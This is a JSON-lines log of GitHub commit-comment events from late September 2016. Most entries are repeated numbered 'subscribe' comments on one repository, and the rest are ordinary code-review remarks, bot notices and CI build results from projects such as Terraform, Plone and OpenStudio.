{"id":"4640773987","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.search"},"payload":{"comment":{"id":19234460,"position":null,"line":null,"path":null,"commit_id":"567a628ffe446778650b7ed90d0fd4878ed265c6","created_at":"2016-09-30T00:21:56Z","updated_at":"2016-09-30T00:21:56Z","body":"Timo Stollenwerk, Anthony Gerrard your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-30T00:21:56Z"}
{"id":"4640774085","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234461,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:21:58Z","updated_at":"2016-09-30T00:21:58Z","body":"subscribe 17"}},"created_at":"2016-09-30T00:21:58Z"}
{"id":"4640775500","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234463,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:22:26Z","updated_at":"2016-09-30T00:22:26Z","body":"subscribe 18"}},"created_at":"2016-09-30T00:22:26Z"}
{"id":"4640776888","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234468,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:22:55Z","updated_at":"2016-09-30T00:22:55Z","body":"subscribe 19"}},"created_at":"2016-09-30T00:22:55Z"}
{"id":"4640777077","type":"CommitCommentEvent","actor":{"login":"stack72"},"repo":{"name":"hashicorp/terraform"},"payload":{"comment":{"id":19234470,"position":null,"line":null,"path":null,"commit_id":"392f634ff492445770be91f07456cff387c80cdd","created_at":"2016-09-30T00:23:00Z","updated_at":"2016-09-30T00:23:00Z","body":"@pmcatominey no sir, on master, I can see the following:\r\n\r\n```\r\n        resp, err := client.GetProperties(resGroup, name)\r\n\tif err != nil {\r\n\t\treturn fmt.Errorf(\"Error reading the state of AzureRM Storage Account %q: %s\", name, err)\r\n\t}\r\n\tif resp.StatusCode == http.StatusNotFound {\r\n\t\td.SetId(\"\")\r\n\t\treturn nil\r\n\t}\r\n```"}},"created_at":"2016-09-30T00:23:00Z"}
{"id":"4640778173","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234472,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:23:22Z","updated_at":"2016-09-30T00:23:22Z","body":"subscribe 20"}},"created_at":"2016-09-30T00:23:22Z"}
{"id":"4640778458","type":"CommitCommentEvent","actor":{"login":"syugoing"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19234474,"position":null,"line":null,"path":null,"commit_id":"71b9421eca5fac483a7ac4c09d37808c85f50a22","created_at":"2016-09-30T00:23:27Z","updated_at":"2016-09-30T00:23:27Z","body":"今までＧｉｔＨｕｂ→Ｈｅｒｏｋｕという流れで保存していたため、ＨｅｒｏｋｕのＦｉｘのために意味のないコミットをしている個所が多々あります。\r\n今後は美しいＧｉｔＨｕｂのためにも、Ｈｅｒｏｋｕも完成したものを目的をもってコミットしていくよう心がけます。"}},"created_at":"2016-09-30T00:23:27Z"}
{"id":"4640780454","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234479,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:24:09Z","updated_at":"2016-09-30T00:24:09Z","body":"subscribe 21"}},"created_at":"2016-09-30T00:24:09Z"}
{"id":"4640781597","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234482,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:24:33Z","updated_at":"2016-09-30T00:24:33Z","body":"subscribe 22"}},"created_at":"2016-09-30T00:24:33Z"}
{"id":"4640782792","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234492,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:24:58Z","updated_at":"2016-09-30T00:24:58Z","body":"subscribe 23"}},"created_at":"2016-09-30T00:24:58Z"}
{"id":"4640784069","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234497,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:25:25Z","updated_at":"2016-09-30T00:25:25Z","body":"subscribe 24"}},"created_at":"2016-09-30T00:25:25Z"}
{"id":"4640785463","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234500,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:25:56Z","updated_at":"2016-09-30T00:25:56Z","body":"subscribe 25"}},"created_at":"2016-09-30T00:25:56Z"}
{"id":"4640786710","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234502,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:26:22Z","updated_at":"2016-09-30T00:26:22Z","body":"subscribe 26"}},"created_at":"2016-09-30T00:26:22Z"}
{"id":"4640787791","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234505,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:26:46Z","updated_at":"2016-09-30T00:26:46Z","body":"subscribe 27"}},"created_at":"2016-09-30T00:26:46Z"}
{"id":"4640789585","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234514,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:27:21Z","updated_at":"2016-09-30T00:27:21Z","body":"subscribe 28"}},"created_at":"2016-09-30T00:27:21Z"}
{"id":"4640791015","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234516,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:27:50Z","updated_at":"2016-09-30T00:27:50Z","body":"subscribe 29"}},"created_at":"2016-09-30T00:27:50Z"}
{"id":"4640792056","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234518,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:28:13Z","updated_at":"2016-09-30T00:28:13Z","body":"subscribe 30"}},"created_at":"2016-09-30T00:28:13Z"}
{"id":"4640793109","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234520,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:28:34Z","updated_at":"2016-09-30T00:28:34Z","body":"subscribe 31"}},"created_at":"2016-09-30T00:28:34Z"}
{"id":"4640794072","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234523,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:28:55Z","updated_at":"2016-09-30T00:28:55Z","body":"subscribe 32"}},"created_at":"2016-09-30T00:28:55Z"}
{"id":"4640795307","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234525,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:29:20Z","updated_at":"2016-09-30T00:29:20Z","body":"subscribe 33"}},"created_at":"2016-09-30T00:29:20Z"}
{"id":"4640796270","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234530,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:29:41Z","updated_at":"2016-09-30T00:29:41Z","body":"subscribe 34"}},"created_at":"2016-09-30T00:29:41Z"}
{"id":"4640797505","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234535,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:30:08Z","updated_at":"2016-09-30T00:30:08Z","body":"subscribe 35"}},"created_at":"2016-09-30T00:30:08Z"}
{"id":"4640798596","type":"CommitCommentEvent","actor":{"login":"MichaelChirico"},"repo":{"name":"Rdatatable/data.table"},"payload":{"comment":{"id":19234538,"position":11,"line":10,"path":"NEWS.md","commit_id":"f78d7901dc5063a5157d37db4831e418ad021fe6","created_at":"2016-09-30T00:30:28Z","updated_at":"2016-09-30T00:30:28Z","body":"> tersely named option\r\n\r\ngot a good laugh at that"}},"created_at":"2016-09-30T00:30:28Z"}
{"id":"4640798808","type":"CommitCommentEvent","actor":{"login":"Manawydan"},"repo":{"name":"SBFA/Unity-25D-Shooter"},"payload":{"comment":{"id":19234539,"position":null,"line":null,"path":null,"commit_id":"f1b69dcd122d77c707aec3e0f167ab727b245d14","created_at":"2016-09-30T00:30:32Z","updated_at":"2016-09-30T00:30:32Z","body":"."}},"created_at":"2016-09-30T00:30:32Z"}
{"id":"4640798893","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234540,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:30:34Z","updated_at":"2016-09-30T00:30:34Z","body":"subscribe 36"}},"created_at":"2016-09-30T00:30:34Z"}
{"id":"4640800135","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234545,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:31:00Z","updated_at":"2016-09-30T00:31:00Z","body":"subscribe 37"}},"created_at":"2016-09-30T00:31:00Z"}
{"id":"4640801102","type":"CommitCommentEvent","actor":{"login":"nickpisacane"},"repo":{"name":"lemoncola/react-dynamic-swiper"},"payload":{"comment":{"id":19234546,"position":null,"line":null,"path":null,"commit_id":"d342a05a646d2126e606fd362bbff508242a3b9f","created_at":"2016-09-30T00:31:20Z","updated_at":"2016-09-30T00:31:20Z","body":"Hey, just saw this in my feed! I recently updated to version one, and had fixed the typos in the _shouldReinitialize method. I didn't however catch the typo in _initSwiper. Anyways, I've updated the features, and fixed the typos. Now, upon re-initialization, Swiper will maintain the current slide index (implementing this is how I ran into the issues in _shouldReinitialize). Any pull requests are welcome!"}},"created_at":"2016-09-30T00:31:20Z"}
{"id":"4640801336","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234547,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:31:24Z","updated_at":"2016-09-30T00:31:24Z","body":"subscribe 38"}},"created_at":"2016-09-30T00:31:24Z"}
{"id":"4640802853","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.search"},"payload":{"comment":{"id":19234550,"position":null,"line":null,"path":null,"commit_id":"36e5071220fe26a6fab29c2b712ddfb48bbdc567","created_at":"2016-09-30T00:31:55Z","updated_at":"2016-09-30T00:31:55Z","body":"Timo Stollenwerk, Anthony Gerrard your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-30T00:31:55Z"}
{"id":"4640803201","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234551,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:32:02Z","updated_at":"2016-09-30T00:32:02Z","body":"subscribe 39"}},"created_at":"2016-09-30T00:32:02Z"}
{"id":"4640804538","type":"CommitCommentEvent","actor":{"login":"JordanRoth"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19234555,"position":null,"line":null,"path":null,"commit_id":"bb6ea1285706fe0b9225a35f098a8d2e2496babd","created_at":"2016-09-30T00:32:29Z","updated_at":"2016-09-30T00:32:29Z","body":"@CPSC310Bot"}},"created_at":"2016-09-30T00:32:29Z"}
{"id":"4640804562","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19234556,"position":null,"line":null,"path":null,"commit_id":"bb6ea1285706fe0b9225a35f098a8d2e2496babd","created_at":"2016-09-30T00:32:29Z","updated_at":"2016-09-30T00:32:29Z","body":"Request cannot be processed; not registered."}},"created_at":"2016-09-30T00:32:29Z"}
{"id":"4640804943","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234559,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:32:37Z","updated_at":"2016-09-30T00:32:37Z","body":"subscribe 40"}},"created_at":"2016-09-30T00:32:37Z"}
{"id":"4640805876","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234560,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:32:56Z","updated_at":"2016-09-30T00:32:56Z","body":"subscribe 41"}},"created_at":"2016-09-30T00:32:56Z"}
{"id":"4640806964","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234561,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:33:19Z","updated_at":"2016-09-30T00:33:19Z","body":"subscribe 42"}},"created_at":"2016-09-30T00:33:19Z"}
{"id":"4640807045","type":"CommitCommentEvent","actor":{"login":"slee-pasonatquila"},"repo":{"name":"slee-pasonatquila/ReactTypescriptDemo"},"payload":{"comment":{"id":19234562,"position":13,"line":26,"path":"src/js/components/TodoApp.jsx","commit_id":"6ea8fbab136835152db155853a760fa85fd11fff","created_at":"2016-09-30T00:33:21Z","updated_at":"2016-09-30T00:33:21Z","body":"This is a test review"}},"created_at":"2016-09-30T00:33:21Z"}
{"id":"4640807806","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234564,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:33:39Z","updated_at":"2016-09-30T00:33:39Z","body":"subscribe 43"}},"created_at":"2016-09-30T00:33:39Z"}
{"id":"4640808708","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234566,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:33:58Z","updated_at":"2016-09-30T00:33:58Z","body":"subscribe 44"}},"created_at":"2016-09-30T00:33:58Z"}
{"id":"4640809759","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234567,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:34:22Z","updated_at":"2016-09-30T00:34:22Z","body":"subscribe 45"}},"created_at":"2016-09-30T00:34:22Z"}
{"id":"4640809974","type":"CommitCommentEvent","actor":{"login":"viniciusmctf"},"repo":{"name":"hausp/lambari"},"payload":{"comment":{"id":19234569,"position":5,"line":222,"path":"projeto1/bison/parser.y","commit_id":"5cea510761fec867b7bbd80999eb1909a6f1f865","created_at":"2016-09-30T00:34:26Z","updated_at":"2016-09-30T00:34:26Z","body":"Shoudn't this T_NL be a non-terminal new_line?\r\nThis might prevent the correct count of lines for the debugger, please check."}},"created_at":"2016-09-30T00:34:26Z"}
{"id":"4640810739","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19234572,"position":null,"line":null,"path":null,"commit_id":"e965863f4bf95041f60d207d606d2dc621a9e0fa","created_at":"2016-09-30T00:34:42Z","updated_at":"2016-09-30T00:34:42Z","body":"buildingunit (nmerket) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2373 of 2452 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e965863f4bf95041f60d207d606d2dc621a9e0fa-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e965863f4bf95041f60d207d606d2dc621a9e0fa-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.78%25-yellow.svg)</a> \n"}},"created_at":"2016-09-30T00:34:42Z"}
{"id":"4640811034","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234574,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:34:48Z","updated_at":"2016-09-30T00:34:48Z","body":"subscribe 46"}},"created_at":"2016-09-30T00:34:48Z"}
{"id":"4640812204","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234577,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:35:13Z","updated_at":"2016-09-30T00:35:13Z","body":"subscribe 47"}},"created_at":"2016-09-30T00:35:13Z"}
{"id":"4640813388","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234580,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:35:36Z","updated_at":"2016-09-30T00:35:36Z","body":"subscribe 48"}},"created_at":"2016-09-30T00:35:36Z"}
{"id":"4640814642","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234582,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:36:00Z","updated_at":"2016-09-30T00:36:00Z","body":"subscribe 49"}},"created_at":"2016-09-30T00:36:00Z"}
{"id":"4640814967","type":"CommitCommentEvent","actor":{"login":"oanylund"},"repo":{"name":"oanylund/doorlock-admin"},"payload":{"comment":{"id":19234583,"position":15,"line":13,"path":"src/index.js","commit_id":"ef5e04ab98c94c224ee1cf2ccf6d73fbb39513c5","created_at":"2016-09-30T00:36:07Z","updated_at":"2016-09-30T00:36:07Z","body":"Needs to be removed before merging to master"}},"created_at":"2016-09-30T00:36:07Z"}
{"id":"4640815838","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234585,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:36:25Z","updated_at":"2016-09-30T00:36:25Z","body":"subscribe 50"}},"created_at":"2016-09-30T00:36:25Z"}
{"id":"4640817277","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234591,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:36:55Z","updated_at":"2016-09-30T00:36:55Z","body":"subscribe 51"}},"created_at":"2016-09-30T00:36:55Z"}
{"id":"4640817279","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"LuizAndrade/EDL"},"payload":{"comment":{"id":19234592,"position":null,"line":null,"path":null,"commit_id":"daace1fd16ad16239875d9bc8aaa1b36b417a53a","created_at":"2016-09-30T00:36:55Z","updated_at":"2016-09-30T00:36:55Z","body":"Melhorar cada resposta como um todo."}},"created_at":"2016-09-30T00:36:55Z"}
{"id":"4640818455","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234596,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:37:21Z","updated_at":"2016-09-30T00:37:21Z","body":"subscribe 52"}},"created_at":"2016-09-30T00:37:21Z"}
{"id":"4640819196","type":"CommitCommentEvent","actor":{"login":"davidker"},"repo":{"name":"davidker/unisys"},"payload":{"comment":{"id":19234597,"position":null,"line":null,"path":null,"commit_id":"8e96f804e1abeaea218797d787b294e4512b9fdb","created_at":"2016-09-30T00:37:38Z","updated_at":"2016-09-30T00:37:38Z","body":"> No need to initialize pmsg_hdr. In fact, it looks like you can delete it altogether, and just directly use\r\n bus_info->pending_msg_hdr when you do the kzalloc() and memcpy().\r\n\r\nOnly issue with getting rid of it, makes it more difficult to stay within spacing guidelines, so I think I'm going to keep it but not initialize it. Though now I'm wondering if we should just abandon the delayed response for things unless they really need it. \r\n"}},"created_at":"2016-09-30T00:37:38Z"}
{"id":"4640820013","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234601,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:37:56Z","updated_at":"2016-09-30T00:37:56Z","body":"subscribe 53"}},"created_at":"2016-09-30T00:37:56Z"}
{"id":"4640821142","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234604,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:38:19Z","updated_at":"2016-09-30T00:38:19Z","body":"subscribe 54"}},"created_at":"2016-09-30T00:38:19Z"}
{"id":"4640822184","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234611,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:38:43Z","updated_at":"2016-09-30T00:38:43Z","body":"subscribe 55"}},"created_at":"2016-09-30T00:38:43Z"}
{"id":"4640823060","type":"CommitCommentEvent","actor":{"login":"harkadious"},"repo":{"name":"harkadious/BirthdayApp"},"payload":{"comment":{"id":19234613,"position":13,"line":10,"path":"app/src/main/res/values/strings.xml","commit_id":"e46c871245e0c565e21a08cd052597e1bddc4db1","created_at":"2016-09-30T00:39:04Z","updated_at":"2016-09-30T00:39:04Z","body":"Hype! Hype! Hype! I'm crazy! ~"}},"created_at":"2016-09-30T00:39:04Z"}
{"id":"4640823200","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"BIRDRED/EDL"},"payload":{"comment":{"id":19234615,"position":null,"line":null,"path":null,"commit_id":"a85ad0dd9e1994e11905108d1aacc154fff827c4","created_at":"2016-09-30T00:39:07Z","updated_at":"2016-09-30T00:39:07Z","body":"ok"}},"created_at":"2016-09-30T00:39:07Z"}
{"id":"4640823410","type":"CommitCommentEvent","actor":{"login":"duvenaud"},"repo":{"name":"HIPS/autograd"},"payload":{"comment":{"id":19234616,"position":null,"line":null,"path":null,"commit_id":"2353c3f7947a4c131d48228923a447491b41e03f","created_at":"2016-09-30T00:39:11Z","updated_at":"2016-09-30T00:39:11Z","body":"Looks so much nicer.  I guess the final frontier is to flatten classes automatically?"}},"created_at":"2016-09-30T00:39:11Z"}
{"id":"4640823531","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234617,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:39:14Z","updated_at":"2016-09-30T00:39:14Z","body":"subscribe 56"}},"created_at":"2016-09-30T00:39:14Z"}
{"id":"4640824516","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234618,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:39:35Z","updated_at":"2016-09-30T00:39:35Z","body":"subscribe 57"}},"created_at":"2016-09-30T00:39:35Z"}
{"id":"4640825658","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234620,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:40:02Z","updated_at":"2016-09-30T00:40:02Z","body":"subscribe 58"}},"created_at":"2016-09-30T00:40:02Z"}
{"id":"4640826552","type":"CommitCommentEvent","actor":{"login":"pedropaulotravassos"},"repo":{"name":"PatriotRented/PimLocVec"},"payload":{"comment":{"id":19234621,"position":null,"line":null,"path":null,"commit_id":"54505913be34c30d03b1b7bc7303e5bea4bfac8b","created_at":"2016-09-30T00:40:21Z","updated_at":"2016-09-30T00:40:21Z","body":"Ignorem foi só um teste"}},"created_at":"2016-09-30T00:40:21Z"}
{"id":"4640826635","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19234622,"position":null,"line":null,"path":null,"commit_id":"e965863f4bf95041f60d207d606d2dc621a9e0fa","created_at":"2016-09-30T00:40:23Z","updated_at":"2016-09-30T00:40:23Z","body":"buildingunit (nmerket) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e965863f4bf95041f60d207d606d2dc621a9e0fa-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-30T00:40:23Z"}
{"id":"4640826702","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234623,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:40:24Z","updated_at":"2016-09-30T00:40:24Z","body":"subscribe 59"}},"created_at":"2016-09-30T00:40:24Z"}
{"id":"4640828123","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234628,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:40:54Z","updated_at":"2016-09-30T00:40:54Z","body":"subscribe 60"}},"created_at":"2016-09-30T00:40:54Z"}
{"id":"4640829582","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19234633,"position":null,"line":null,"path":null,"commit_id":"1c30ffc64a005d7276ddd9ae350ee41236bcb82c","created_at":"2016-09-30T00:41:23Z","updated_at":"2016-09-30T00:41:23Z","body":"I hope Microsoft never changes the `WAIT_OBJECT_0` define to be something other than 0."}},"created_at":"2016-09-30T00:41:23Z"}
{"id":"4640829585","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234634,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:41:23Z","updated_at":"2016-09-30T00:41:23Z","body":"subscribe 61"}},"created_at":"2016-09-30T00:41:23Z"}
{"id":"4640831170","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19234636,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T00:42:00Z","updated_at":"2016-09-30T00:42:00Z","body":"subscribe 62"}},"created_at":"2016-09-30T00:42:00Z"}
